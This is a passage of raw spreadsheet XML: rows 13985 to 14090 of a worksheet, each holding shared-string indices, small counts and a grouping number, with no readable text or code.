    <row r="13985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13985" t="s">
        <v>16223</v>
      </c>
      <c r="B13985" t="s">
        <v>16223</v>
      </c>
      <c r="C13985">
        <v>26</v>
      </c>
      <c r="D13985">
        <v>5099</v>
      </c>
    </row>
    <row r="13986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13986" t="s">
        <v>16224</v>
      </c>
      <c r="B13986" t="s">
        <v>16224</v>
      </c>
      <c r="C13986">
        <v>1</v>
      </c>
      <c r="D13986">
        <v>5099</v>
      </c>
    </row>
    <row r="13987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13987" t="s">
        <v>16228</v>
      </c>
      <c r="B13987" t="s">
        <v>16211</v>
      </c>
      <c r="C13987">
        <v>0</v>
      </c>
      <c r="D13987">
        <v>42</v>
      </c>
    </row>
    <row r="13988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13988" t="s">
        <v>16231</v>
      </c>
      <c r="B13988" t="s">
        <v>16212</v>
      </c>
      <c r="C13988">
        <v>0</v>
      </c>
      <c r="D13988">
        <v>42</v>
      </c>
    </row>
    <row r="13989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13989" t="s">
        <v>16228</v>
      </c>
      <c r="B13989" t="s">
        <v>16213</v>
      </c>
      <c r="C13989">
        <v>0</v>
      </c>
      <c r="D13989">
        <v>42</v>
      </c>
    </row>
    <row r="13990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13990" t="s">
        <v>16231</v>
      </c>
      <c r="B13990" t="s">
        <v>16214</v>
      </c>
      <c r="C13990">
        <v>0</v>
      </c>
      <c r="D13990">
        <v>42</v>
      </c>
    </row>
    <row r="13991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13991" t="s">
        <v>16228</v>
      </c>
      <c r="B13991" t="s">
        <v>16215</v>
      </c>
      <c r="C13991">
        <v>4</v>
      </c>
      <c r="D13991">
        <v>42</v>
      </c>
    </row>
    <row r="13992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13992" t="s">
        <v>16231</v>
      </c>
      <c r="B13992" t="s">
        <v>16216</v>
      </c>
      <c r="C13992">
        <v>5</v>
      </c>
      <c r="D13992">
        <v>42</v>
      </c>
    </row>
    <row r="13993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13993" t="s">
        <v>16228</v>
      </c>
      <c r="B13993" t="s">
        <v>16217</v>
      </c>
      <c r="C13993">
        <v>52</v>
      </c>
      <c r="D13993">
        <v>42</v>
      </c>
    </row>
    <row r="13994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13994" t="s">
        <v>16231</v>
      </c>
      <c r="B13994" t="s">
        <v>16218</v>
      </c>
      <c r="C13994">
        <v>6</v>
      </c>
      <c r="D13994">
        <v>42</v>
      </c>
    </row>
    <row r="13995" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13995" t="s">
        <v>16229</v>
      </c>
      <c r="B13995" t="s">
        <v>16219</v>
      </c>
      <c r="C13995">
        <v>0</v>
      </c>
      <c r="D13995">
        <v>42</v>
      </c>
    </row>
    <row r="13996" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13996" t="s">
        <v>16230</v>
      </c>
      <c r="B13996" t="s">
        <v>16220</v>
      </c>
      <c r="C13996">
        <v>0</v>
      </c>
      <c r="D13996">
        <v>42</v>
      </c>
    </row>
    <row r="13997" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13997" t="s">
        <v>16229</v>
      </c>
      <c r="B13997" t="s">
        <v>16221</v>
      </c>
      <c r="C13997">
        <v>0</v>
      </c>
      <c r="D13997">
        <v>42</v>
      </c>
    </row>
    <row r="13998" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13998" t="s">
        <v>16230</v>
      </c>
      <c r="B13998" t="s">
        <v>16222</v>
      </c>
      <c r="C13998">
        <v>0</v>
      </c>
      <c r="D13998">
        <v>42</v>
      </c>
    </row>
    <row r="13999" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A13999" t="s">
        <v>16223</v>
      </c>
      <c r="B13999" t="s">
        <v>16223</v>
      </c>
      <c r="C13999">
        <v>25</v>
      </c>
      <c r="D13999">
        <v>42</v>
      </c>
    </row>
    <row r="14000" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14000" t="s">
        <v>16224</v>
      </c>
      <c r="B14000" t="s">
        <v>16224</v>
      </c>
      <c r="C14000">
        <v>0</v>
      </c>
      <c r="D14000">
        <v>42</v>
      </c>
    </row>
    <row r="14001" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14001" t="s">
        <v>16228</v>
      </c>
      <c r="B14001" t="s">
        <v>16211</v>
      </c>
      <c r="C14001">
        <v>1</v>
      </c>
      <c r="D14001">
        <v>5155</v>
      </c>
    </row>
    <row r="14002" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14002" t="s">
        <v>16231</v>
      </c>
      <c r="B14002" t="s">
        <v>16212</v>
      </c>
      <c r="C14002">
        <v>0</v>
      </c>
      <c r="D14002">
        <v>5155</v>
      </c>
    </row>
    <row r="14003" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14003" t="s">
        <v>16228</v>
      </c>
      <c r="B14003" t="s">
        <v>16213</v>
      </c>
      <c r="C14003">
        <v>0</v>
      </c>
      <c r="D14003">
        <v>5155</v>
      </c>
    </row>
    <row r="14004" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14004" t="s">
        <v>16231</v>
      </c>
      <c r="B14004" t="s">
        <v>16214</v>
      </c>
      <c r="C14004">
        <v>0</v>
      </c>
      <c r="D14004">
        <v>5155</v>
      </c>
    </row>
    <row r="14005" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14005" t="s">
        <v>16228</v>
      </c>
      <c r="B14005" t="s">
        <v>16215</v>
      </c>
      <c r="C14005">
        <v>0</v>
      </c>
      <c r="D14005">
        <v>5155</v>
      </c>
    </row>
    <row r="14006" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14006" t="s">
        <v>16231</v>
      </c>
      <c r="B14006" t="s">
        <v>16216</v>
      </c>
      <c r="C14006">
        <v>1</v>
      </c>
      <c r="D14006">
        <v>5155</v>
      </c>
    </row>
    <row r="14007" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14007" t="s">
        <v>16228</v>
      </c>
      <c r="B14007" t="s">
        <v>16217</v>
      </c>
      <c r="C14007">
        <v>0</v>
      </c>
      <c r="D14007">
        <v>5155</v>
      </c>
    </row>
    <row r="14008" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14008" t="s">
        <v>16231</v>
      </c>
      <c r="B14008" t="s">
        <v>16218</v>
      </c>
      <c r="C14008">
        <v>0</v>
      </c>
      <c r="D14008">
        <v>5155</v>
      </c>
    </row>
    <row r="14009" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14009" t="s">
        <v>16229</v>
      </c>
      <c r="B14009" t="s">
        <v>16219</v>
      </c>
      <c r="C14009">
        <v>1</v>
      </c>
      <c r="D14009">
        <v>5155</v>
      </c>
    </row>
    <row r="14010" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14010" t="s">
        <v>16230</v>
      </c>
      <c r="B14010" t="s">
        <v>16220</v>
      </c>
      <c r="C14010">
        <v>0</v>
      </c>
      <c r="D14010">
        <v>5155</v>
      </c>
    </row>
    <row r="14011" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14011" t="s">
        <v>16229</v>
      </c>
      <c r="B14011" t="s">
        <v>16221</v>
      </c>
      <c r="C14011">
        <v>3</v>
      </c>
      <c r="D14011">
        <v>5155</v>
      </c>
    </row>
    <row r="14012" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14012" t="s">
        <v>16230</v>
      </c>
      <c r="B14012" t="s">
        <v>16222</v>
      </c>
      <c r="C14012">
        <v>8</v>
      </c>
      <c r="D14012">
        <v>5155</v>
      </c>
    </row>
    <row r="14013" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14013" t="s">
        <v>16223</v>
      </c>
      <c r="B14013" t="s">
        <v>16223</v>
      </c>
      <c r="C14013">
        <v>26</v>
      </c>
      <c r="D14013">
        <v>5155</v>
      </c>
    </row>
    <row r="14014" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14014" t="s">
        <v>16224</v>
      </c>
      <c r="B14014" t="s">
        <v>16224</v>
      </c>
      <c r="C14014">
        <v>1</v>
      </c>
      <c r="D14014">
        <v>5155</v>
      </c>
    </row>
    <row r="14015" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14015" t="s">
        <v>16228</v>
      </c>
      <c r="B14015" t="s">
        <v>16211</v>
      </c>
      <c r="C14015">
        <v>0</v>
      </c>
      <c r="D14015">
        <v>5175</v>
      </c>
    </row>
    <row r="14016" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14016" t="s">
        <v>16231</v>
      </c>
      <c r="B14016" t="s">
        <v>16212</v>
      </c>
      <c r="C14016">
        <v>0</v>
      </c>
      <c r="D14016">
        <v>5175</v>
      </c>
    </row>
    <row r="14017" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14017" t="s">
        <v>16228</v>
      </c>
      <c r="B14017" t="s">
        <v>16213</v>
      </c>
      <c r="C14017">
        <v>0</v>
      </c>
      <c r="D14017">
        <v>5175</v>
      </c>
    </row>
    <row r="14018" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14018" t="s">
        <v>16231</v>
      </c>
      <c r="B14018" t="s">
        <v>16214</v>
      </c>
      <c r="C14018">
        <v>0</v>
      </c>
      <c r="D14018">
        <v>5175</v>
      </c>
    </row>
    <row r="14019" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14019" t="s">
        <v>16228</v>
      </c>
      <c r="B14019" t="s">
        <v>16215</v>
      </c>
      <c r="C14019">
        <v>0</v>
      </c>
      <c r="D14019">
        <v>5175</v>
      </c>
    </row>
    <row r="14020" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14020" t="s">
        <v>16231</v>
      </c>
      <c r="B14020" t="s">
        <v>16216</v>
      </c>
      <c r="C14020">
        <v>1</v>
      </c>
      <c r="D14020">
        <v>5175</v>
      </c>
    </row>
    <row r="14021" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14021" t="s">
        <v>16228</v>
      </c>
      <c r="B14021" t="s">
        <v>16217</v>
      </c>
      <c r="C14021">
        <v>4</v>
      </c>
      <c r="D14021">
        <v>5175</v>
      </c>
    </row>
    <row r="14022" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14022" t="s">
        <v>16231</v>
      </c>
      <c r="B14022" t="s">
        <v>16218</v>
      </c>
      <c r="C14022">
        <v>0</v>
      </c>
      <c r="D14022">
        <v>5175</v>
      </c>
    </row>
    <row r="14023" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14023" t="s">
        <v>16229</v>
      </c>
      <c r="B14023" t="s">
        <v>16219</v>
      </c>
      <c r="C14023">
        <v>0</v>
      </c>
      <c r="D14023">
        <v>5175</v>
      </c>
    </row>
    <row r="14024" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14024" t="s">
        <v>16230</v>
      </c>
      <c r="B14024" t="s">
        <v>16220</v>
      </c>
      <c r="C14024">
        <v>5</v>
      </c>
      <c r="D14024">
        <v>5175</v>
      </c>
    </row>
    <row r="14025" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14025" t="s">
        <v>16229</v>
      </c>
      <c r="B14025" t="s">
        <v>16221</v>
      </c>
      <c r="C14025">
        <v>30</v>
      </c>
      <c r="D14025">
        <v>5175</v>
      </c>
    </row>
    <row r="14026" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14026" t="s">
        <v>16230</v>
      </c>
      <c r="B14026" t="s">
        <v>16222</v>
      </c>
      <c r="C14026">
        <v>10</v>
      </c>
      <c r="D14026">
        <v>5175</v>
      </c>
    </row>
    <row r="14027" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14027" t="s">
        <v>16223</v>
      </c>
      <c r="B14027" t="s">
        <v>16223</v>
      </c>
      <c r="C14027">
        <v>24</v>
      </c>
      <c r="D14027">
        <v>5175</v>
      </c>
    </row>
    <row r="14028" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14028" t="s">
        <v>16224</v>
      </c>
      <c r="B14028" t="s">
        <v>16224</v>
      </c>
      <c r="C14028">
        <v>2</v>
      </c>
      <c r="D14028">
        <v>5175</v>
      </c>
    </row>
    <row r="14029" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14029" t="s">
        <v>16228</v>
      </c>
      <c r="B14029" t="s">
        <v>16211</v>
      </c>
      <c r="C14029">
        <v>0</v>
      </c>
      <c r="D14029">
        <v>911</v>
      </c>
    </row>
    <row r="14030" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14030" t="s">
        <v>16231</v>
      </c>
      <c r="B14030" t="s">
        <v>16212</v>
      </c>
      <c r="C14030">
        <v>0</v>
      </c>
      <c r="D14030">
        <v>911</v>
      </c>
    </row>
    <row r="14031" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14031" t="s">
        <v>16228</v>
      </c>
      <c r="B14031" t="s">
        <v>16213</v>
      </c>
      <c r="C14031">
        <v>60</v>
      </c>
      <c r="D14031">
        <v>911</v>
      </c>
    </row>
    <row r="14032" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14032" t="s">
        <v>16231</v>
      </c>
      <c r="B14032" t="s">
        <v>16214</v>
      </c>
      <c r="C14032">
        <v>440</v>
      </c>
      <c r="D14032">
        <v>911</v>
      </c>
    </row>
    <row r="14033" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14033" t="s">
        <v>16228</v>
      </c>
      <c r="B14033" t="s">
        <v>16215</v>
      </c>
      <c r="C14033">
        <v>0</v>
      </c>
      <c r="D14033">
        <v>911</v>
      </c>
    </row>
    <row r="14034" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14034" t="s">
        <v>16231</v>
      </c>
      <c r="B14034" t="s">
        <v>16216</v>
      </c>
      <c r="C14034">
        <v>10</v>
      </c>
      <c r="D14034">
        <v>911</v>
      </c>
    </row>
    <row r="14035" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14035" t="s">
        <v>16228</v>
      </c>
      <c r="B14035" t="s">
        <v>16217</v>
      </c>
      <c r="C14035">
        <v>3</v>
      </c>
      <c r="D14035">
        <v>911</v>
      </c>
    </row>
    <row r="14036" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14036" t="s">
        <v>16231</v>
      </c>
      <c r="B14036" t="s">
        <v>16218</v>
      </c>
      <c r="C14036">
        <v>4</v>
      </c>
      <c r="D14036">
        <v>911</v>
      </c>
    </row>
    <row r="14037" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14037" t="s">
        <v>16229</v>
      </c>
      <c r="B14037" t="s">
        <v>16219</v>
      </c>
      <c r="C14037">
        <v>0</v>
      </c>
      <c r="D14037">
        <v>911</v>
      </c>
    </row>
    <row r="14038" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14038" t="s">
        <v>16230</v>
      </c>
      <c r="B14038" t="s">
        <v>16220</v>
      </c>
      <c r="C14038">
        <v>15</v>
      </c>
      <c r="D14038">
        <v>911</v>
      </c>
    </row>
    <row r="14039" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14039" t="s">
        <v>16229</v>
      </c>
      <c r="B14039" t="s">
        <v>16221</v>
      </c>
      <c r="C14039">
        <v>57</v>
      </c>
      <c r="D14039">
        <v>911</v>
      </c>
    </row>
    <row r="14040" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14040" t="s">
        <v>16230</v>
      </c>
      <c r="B14040" t="s">
        <v>16222</v>
      </c>
      <c r="C14040">
        <v>406</v>
      </c>
      <c r="D14040">
        <v>911</v>
      </c>
    </row>
    <row r="14041" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14041" t="s">
        <v>16223</v>
      </c>
      <c r="B14041" t="s">
        <v>16223</v>
      </c>
      <c r="C14041">
        <v>30</v>
      </c>
      <c r="D14041">
        <v>911</v>
      </c>
    </row>
    <row r="14042" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14042" t="s">
        <v>16224</v>
      </c>
      <c r="B14042" t="s">
        <v>16224</v>
      </c>
      <c r="C14042">
        <v>1</v>
      </c>
      <c r="D14042">
        <v>911</v>
      </c>
    </row>
    <row r="14043" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14043" t="s">
        <v>16228</v>
      </c>
      <c r="B14043" t="s">
        <v>16211</v>
      </c>
      <c r="C14043">
        <v>0</v>
      </c>
      <c r="D14043">
        <v>1034</v>
      </c>
    </row>
    <row r="14044" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14044" t="s">
        <v>16231</v>
      </c>
      <c r="B14044" t="s">
        <v>16212</v>
      </c>
      <c r="C14044">
        <v>0</v>
      </c>
      <c r="D14044">
        <v>1034</v>
      </c>
    </row>
    <row r="14045" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14045" t="s">
        <v>16228</v>
      </c>
      <c r="B14045" t="s">
        <v>16213</v>
      </c>
      <c r="C14045">
        <v>0</v>
      </c>
      <c r="D14045">
        <v>1034</v>
      </c>
    </row>
    <row r="14046" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14046" t="s">
        <v>16231</v>
      </c>
      <c r="B14046" t="s">
        <v>16214</v>
      </c>
      <c r="C14046">
        <v>0</v>
      </c>
      <c r="D14046">
        <v>1034</v>
      </c>
    </row>
    <row r="14047" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14047" t="s">
        <v>16228</v>
      </c>
      <c r="B14047" t="s">
        <v>16215</v>
      </c>
      <c r="C14047">
        <v>2</v>
      </c>
      <c r="D14047">
        <v>1034</v>
      </c>
    </row>
    <row r="14048" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14048" t="s">
        <v>16231</v>
      </c>
      <c r="B14048" t="s">
        <v>16216</v>
      </c>
      <c r="C14048">
        <v>0</v>
      </c>
      <c r="D14048">
        <v>1034</v>
      </c>
    </row>
    <row r="14049" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14049" t="s">
        <v>16228</v>
      </c>
      <c r="B14049" t="s">
        <v>16217</v>
      </c>
      <c r="C14049">
        <v>4</v>
      </c>
      <c r="D14049">
        <v>1034</v>
      </c>
    </row>
    <row r="14050" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14050" t="s">
        <v>16231</v>
      </c>
      <c r="B14050" t="s">
        <v>16218</v>
      </c>
      <c r="C14050">
        <v>0</v>
      </c>
      <c r="D14050">
        <v>1034</v>
      </c>
    </row>
    <row r="14051" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14051" t="s">
        <v>16229</v>
      </c>
      <c r="B14051" t="s">
        <v>16219</v>
      </c>
      <c r="C14051">
        <v>8</v>
      </c>
      <c r="D14051">
        <v>1034</v>
      </c>
    </row>
    <row r="14052" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14052" t="s">
        <v>16230</v>
      </c>
      <c r="B14052" t="s">
        <v>16220</v>
      </c>
      <c r="C14052">
        <v>8</v>
      </c>
      <c r="D14052">
        <v>1034</v>
      </c>
    </row>
    <row r="14053" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14053" t="s">
        <v>16229</v>
      </c>
      <c r="B14053" t="s">
        <v>16221</v>
      </c>
      <c r="C14053">
        <v>0</v>
      </c>
      <c r="D14053">
        <v>1034</v>
      </c>
    </row>
    <row r="14054" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14054" t="s">
        <v>16230</v>
      </c>
      <c r="B14054" t="s">
        <v>16222</v>
      </c>
      <c r="C14054">
        <v>0</v>
      </c>
      <c r="D14054">
        <v>1034</v>
      </c>
    </row>
    <row r="14055" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14055" t="s">
        <v>16223</v>
      </c>
      <c r="B14055" t="s">
        <v>16223</v>
      </c>
      <c r="C14055">
        <v>0</v>
      </c>
      <c r="D14055">
        <v>1034</v>
      </c>
    </row>
    <row r="14056" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14056" t="s">
        <v>16224</v>
      </c>
      <c r="B14056" t="s">
        <v>16224</v>
      </c>
      <c r="C14056">
        <v>0</v>
      </c>
      <c r="D14056">
        <v>1034</v>
      </c>
    </row>
    <row r="14057" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14057" t="s">
        <v>16228</v>
      </c>
      <c r="B14057" t="s">
        <v>16211</v>
      </c>
      <c r="C14057">
        <v>0</v>
      </c>
      <c r="D14057">
        <v>7</v>
      </c>
    </row>
    <row r="14058" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14058" t="s">
        <v>16231</v>
      </c>
      <c r="B14058" t="s">
        <v>16212</v>
      </c>
      <c r="C14058">
        <v>0</v>
      </c>
      <c r="D14058">
        <v>7</v>
      </c>
    </row>
    <row r="14059" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14059" t="s">
        <v>16228</v>
      </c>
      <c r="B14059" t="s">
        <v>16213</v>
      </c>
      <c r="C14059">
        <v>0</v>
      </c>
      <c r="D14059">
        <v>7</v>
      </c>
    </row>
    <row r="14060" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14060" t="s">
        <v>16231</v>
      </c>
      <c r="B14060" t="s">
        <v>16214</v>
      </c>
      <c r="C14060">
        <v>0</v>
      </c>
      <c r="D14060">
        <v>7</v>
      </c>
    </row>
    <row r="14061" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14061" t="s">
        <v>16228</v>
      </c>
      <c r="B14061" t="s">
        <v>16215</v>
      </c>
      <c r="C14061">
        <v>4</v>
      </c>
      <c r="D14061">
        <v>7</v>
      </c>
    </row>
    <row r="14062" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14062" t="s">
        <v>16231</v>
      </c>
      <c r="B14062" t="s">
        <v>16216</v>
      </c>
      <c r="C14062">
        <v>2</v>
      </c>
      <c r="D14062">
        <v>7</v>
      </c>
    </row>
    <row r="14063" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14063" t="s">
        <v>16228</v>
      </c>
      <c r="B14063" t="s">
        <v>16217</v>
      </c>
      <c r="C14063">
        <v>0</v>
      </c>
      <c r="D14063">
        <v>7</v>
      </c>
    </row>
    <row r="14064" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14064" t="s">
        <v>16231</v>
      </c>
      <c r="B14064" t="s">
        <v>16218</v>
      </c>
      <c r="C14064">
        <v>0</v>
      </c>
      <c r="D14064">
        <v>7</v>
      </c>
    </row>
    <row r="14065" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14065" t="s">
        <v>16229</v>
      </c>
      <c r="B14065" t="s">
        <v>16219</v>
      </c>
      <c r="C14065">
        <v>0</v>
      </c>
      <c r="D14065">
        <v>7</v>
      </c>
    </row>
    <row r="14066" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14066" t="s">
        <v>16230</v>
      </c>
      <c r="B14066" t="s">
        <v>16220</v>
      </c>
      <c r="C14066">
        <v>0</v>
      </c>
      <c r="D14066">
        <v>7</v>
      </c>
    </row>
    <row r="14067" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14067" t="s">
        <v>16229</v>
      </c>
      <c r="B14067" t="s">
        <v>16221</v>
      </c>
      <c r="C14067">
        <v>0</v>
      </c>
      <c r="D14067">
        <v>7</v>
      </c>
    </row>
    <row r="14068" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14068" t="s">
        <v>16230</v>
      </c>
      <c r="B14068" t="s">
        <v>16222</v>
      </c>
      <c r="C14068">
        <v>0</v>
      </c>
      <c r="D14068">
        <v>7</v>
      </c>
    </row>
    <row r="14069" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14069" t="s">
        <v>16223</v>
      </c>
      <c r="B14069" t="s">
        <v>16223</v>
      </c>
      <c r="C14069">
        <v>6</v>
      </c>
      <c r="D14069">
        <v>7</v>
      </c>
    </row>
    <row r="14070" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14070" t="s">
        <v>16224</v>
      </c>
      <c r="B14070" t="s">
        <v>16224</v>
      </c>
      <c r="C14070">
        <v>2</v>
      </c>
      <c r="D14070">
        <v>7</v>
      </c>
    </row>
    <row r="14071" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14071" t="s">
        <v>16228</v>
      </c>
      <c r="B14071" t="s">
        <v>16211</v>
      </c>
      <c r="C14071">
        <v>0</v>
      </c>
      <c r="D14071">
        <v>51</v>
      </c>
    </row>
    <row r="14072" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14072" t="s">
        <v>16231</v>
      </c>
      <c r="B14072" t="s">
        <v>16212</v>
      </c>
      <c r="C14072">
        <v>0</v>
      </c>
      <c r="D14072">
        <v>51</v>
      </c>
    </row>
    <row r="14073" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14073" t="s">
        <v>16228</v>
      </c>
      <c r="B14073" t="s">
        <v>16213</v>
      </c>
      <c r="C14073">
        <v>0</v>
      </c>
      <c r="D14073">
        <v>51</v>
      </c>
    </row>
    <row r="14074" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14074" t="s">
        <v>16231</v>
      </c>
      <c r="B14074" t="s">
        <v>16214</v>
      </c>
      <c r="C14074">
        <v>0</v>
      </c>
      <c r="D14074">
        <v>51</v>
      </c>
    </row>
    <row r="14075" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14075" t="s">
        <v>16228</v>
      </c>
      <c r="B14075" t="s">
        <v>16215</v>
      </c>
      <c r="C14075">
        <v>3</v>
      </c>
      <c r="D14075">
        <v>51</v>
      </c>
    </row>
    <row r="14076" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14076" t="s">
        <v>16231</v>
      </c>
      <c r="B14076" t="s">
        <v>16216</v>
      </c>
      <c r="C14076">
        <v>1</v>
      </c>
      <c r="D14076">
        <v>51</v>
      </c>
    </row>
    <row r="14077" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14077" t="s">
        <v>16228</v>
      </c>
      <c r="B14077" t="s">
        <v>16217</v>
      </c>
      <c r="C14077">
        <v>0</v>
      </c>
      <c r="D14077">
        <v>51</v>
      </c>
    </row>
    <row r="14078" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14078" t="s">
        <v>16231</v>
      </c>
      <c r="B14078" t="s">
        <v>16218</v>
      </c>
      <c r="C14078">
        <v>0</v>
      </c>
      <c r="D14078">
        <v>51</v>
      </c>
    </row>
    <row r="14079" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14079" t="s">
        <v>16229</v>
      </c>
      <c r="B14079" t="s">
        <v>16219</v>
      </c>
      <c r="C14079">
        <v>1</v>
      </c>
      <c r="D14079">
        <v>51</v>
      </c>
    </row>
    <row r="14080" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14080" t="s">
        <v>16230</v>
      </c>
      <c r="B14080" t="s">
        <v>16220</v>
      </c>
      <c r="C14080">
        <v>0</v>
      </c>
      <c r="D14080">
        <v>51</v>
      </c>
    </row>
    <row r="14081" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14081" t="s">
        <v>16229</v>
      </c>
      <c r="B14081" t="s">
        <v>16221</v>
      </c>
      <c r="C14081">
        <v>0</v>
      </c>
      <c r="D14081">
        <v>51</v>
      </c>
    </row>
    <row r="14082" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14082" t="s">
        <v>16230</v>
      </c>
      <c r="B14082" t="s">
        <v>16222</v>
      </c>
      <c r="C14082">
        <v>0</v>
      </c>
      <c r="D14082">
        <v>51</v>
      </c>
    </row>
    <row r="14083" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14083" t="s">
        <v>16223</v>
      </c>
      <c r="B14083" t="s">
        <v>16223</v>
      </c>
      <c r="C14083">
        <v>0</v>
      </c>
      <c r="D14083">
        <v>51</v>
      </c>
    </row>
    <row r="14084" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14084" t="s">
        <v>16224</v>
      </c>
      <c r="B14084" t="s">
        <v>16224</v>
      </c>
      <c r="C14084">
        <v>0</v>
      </c>
      <c r="D14084">
        <v>51</v>
      </c>
    </row>
    <row r="14085" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14085" t="s">
        <v>16228</v>
      </c>
      <c r="B14085" t="s">
        <v>16211</v>
      </c>
      <c r="C14085">
        <v>0</v>
      </c>
      <c r="D14085">
        <v>1980</v>
      </c>
    </row>
    <row r="14086" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14086" t="s">
        <v>16231</v>
      </c>
      <c r="B14086" t="s">
        <v>16212</v>
      </c>
      <c r="C14086">
        <v>0</v>
      </c>
      <c r="D14086">
        <v>1980</v>
      </c>
    </row>
    <row r="14087" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14087" t="s">
        <v>16228</v>
      </c>
      <c r="B14087" t="s">
        <v>16213</v>
      </c>
      <c r="C14087">
        <v>0</v>
      </c>
      <c r="D14087">
        <v>1980</v>
      </c>
    </row>
    <row r="14088" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14088" t="s">
        <v>16231</v>
      </c>
      <c r="B14088" t="s">
        <v>16214</v>
      </c>
      <c r="C14088">
        <v>0</v>
      </c>
      <c r="D14088">
        <v>1980</v>
      </c>
    </row>
    <row r="14089" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A14089" t="s">
        <v>16228</v>
      </c>
      <c r="B14089" t="s">
        <v>16215</v>
      </c>
      <c r="C14089">
        <v>7</v>
      </c>
      <c r="D14089">
        <v>1980</v>
      </c>
    </row>
    <row r="14090" spans="1:4" x14ac:dyDescent="0.2">
